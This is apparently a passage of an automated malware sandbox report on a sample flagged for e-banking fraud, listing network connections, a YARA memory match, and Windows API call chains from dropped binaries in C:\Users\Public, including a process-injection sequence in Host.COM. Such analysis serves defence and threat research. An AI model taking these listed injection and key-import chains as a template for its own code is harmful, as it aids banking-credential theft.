      Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
      Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
      Source: unknown, HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: Yara match, File source: Process Memory Space: Host.COM PID: 7652, type: MEMORYSTR

      E-Banking Fraud

      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E07EB684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,6_2_00007FF7E07EB684
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E082E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF7E082E1F8
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E07F25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF7E07F25E8
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E086A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E086A740
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E07F29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF7E07F29A0
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E081EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF7E081EA7C
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E0866EA8 NCryptImportKey,#360,6_2_00007FF7E0866EA8
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E0830EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF7E0830EF4
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E0820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF7E0820F58
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E08693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E08693A0
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E083342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E083342C
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E08698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E08698B0
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E082184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF7E082184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF7E07BF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF7E07CFC20
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,3_2_00007FF7937588C0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,3_2_00007FF79376BCF0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,3_2_00007FF793758114
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,3_2_00007FF793757FF8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,3_2_00007FF7937589E4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,3_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79375898C NtQueryInformationToken,3_2_00007FF79375898C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,3_2_00007FF793743D94
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,5_2_00007FF7937588C0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,5_2_00007FF79376BCF0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,5_2_00007FF793758114
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,5_2_00007FF793757FF8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,5_2_00007FF7937589E4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,5_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79375898C NtQueryInformationToken,5_2_00007FF79375898C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,5_2_00007FF793743D94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E088C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,6_2_00007FF7E088C964
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E07D80 NtWriteVirtualMemory,9_2_02E07D80
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0DD6C RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,9_2_02E0DD6C
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0DBAC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02E0DBAC
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0DC88 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,9_2_02E0DC88
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0DC00 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02E0DC00
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08D6A GetThreadContext,SetThreadContext,NtResumeThread,9_2_02E08D6A
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08D6C GetThreadContext,SetThreadContext,NtResumeThread,9_2_02E08D6C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF793758114
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF793757FF8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF7937588C0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF79376BCF0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF7937589E4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375898C NtQueryInformationToken,10_2_00007FF79375898C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF793743D94
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF793758114
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF793757FF8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF7937588C0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF79376BCF0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7937589E4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375898C NtQueryInformationToken,11_2_00007FF79375898C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF793743D94
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793745240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,3_2_00007FF793745240
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793754224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,3_2_00007FF793754224
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E079FB846_2_00007FF7E079FB84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07ABCA46_2_00007FF7E07ABCA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C9CD06_2_00007FF7E07C9CD0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0859CC06_2_00007FF7E0859CC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EBCE86_2_00007FF7E07EBCE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A5D086_2_00007FF7E07A5D08
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CFC206_2_00007FF7E07CFC20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EFC346_2_00007FF7E07EFC34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E3C606_2_00007FF7E07E3C60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089FC906_2_00007FF7E089FC90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0811C906_2_00007FF7E0811C90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082BDA06_2_00007FF7E082BDA0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A1DE86_2_00007FF7E07A1DE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C5DF76_2_00007FF7E07C5DF7
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CDD206_2_00007FF7E07CDD20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0847D706_2_00007FF7E0847D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F1D706_2_00007FF7E07F1D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E9D6C6_2_00007FF7E07E9D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089DD846_2_00007FF7E089DD84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EDEA46_2_00007FF7E07EDEA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081DEB06_2_00007FF7E081DEB0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E1ED06_2_00007FF7E07E1ED0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0819EE46_2_00007FF7E0819EE4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0825F046_2_00007FF7E0825F04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0821E2C6_2_00007FF7E0821E2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081BE706_2_00007FF7E081BE70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0849FF86_2_00007FF7E0849FF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0791F806_2_00007FF7E0791F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FC0B86_2_00007FF7E07FC0B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F80186_2_00007FF7E07F8018
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C80806_2_00007FF7E07C8080
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08620846_2_00007FF7E0862084
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF20C49_2_02DF20C4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375785410_2_00007FF793757854
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937537D810_2_00007FF7937537D8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374341010_2_00007FF793743410
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374AA5410_2_00007FF79374AA54
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793748DF810_2_00007FF793748DF8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375555410_2_00007FF793755554
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937518D410_2_00007FF7937518D4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374B0D810_2_00007FF79374B0D8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374851010_2_00007FF793748510
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793742C4810_2_00007FF793742C48
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376AC4C10_2_00007FF79376AC4C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374188410_2_00007FF793741884
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376AFBC10_2_00007FF79376AFBC
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793746BE010_2_00007FF793746BE0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374372C10_2_00007FF79374372C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793749B5010_2_00007FF793749B50
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793745B7010_2_00007FF793745B70
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793743F9010_2_00007FF793743F90
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793746EE410_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793767F0010_2_00007FF793767F00
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375422410_2_00007FF793754224
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374222010_2_00007FF793742220
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793744A3010_2_00007FF793744A30
